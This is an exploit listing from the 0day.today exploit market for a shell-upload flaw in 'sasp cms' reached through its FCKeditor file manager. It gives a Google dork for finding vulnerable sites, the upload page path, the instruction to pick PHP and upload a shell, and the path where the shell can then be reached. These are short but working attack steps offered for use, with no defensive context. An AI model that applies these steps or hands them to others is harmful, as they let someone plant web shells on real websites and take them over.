[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

sasp cms (fckeditor) shell upload Vulnerability

Author
Ashiyane
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4366
Category
web applications
Date add
17-08-2010
Platform
php
===============================================
sasp cms (fckeditor) shell upload Vulnerability 
===============================================

# Author: ashiyane digital security team

# Version: 0.9

# Category:: upload bug

discovered by:ramin bazghandi (fr0nk)

greetz to:behrooz_ice,virangar,keivan,iman_taktaz,n4h,smyty,veron,satanic2000 and all ashiyane members

# Google dork: powered by saspcms

p0c:http://localhost//fckeditor/editor/filemanager/upload/test.html

select php and upload shell

your shell uploaded in:http://localhost/file/yourshell.php

^_^ o_0 O_O



#  0day.today [2024-12-25]  #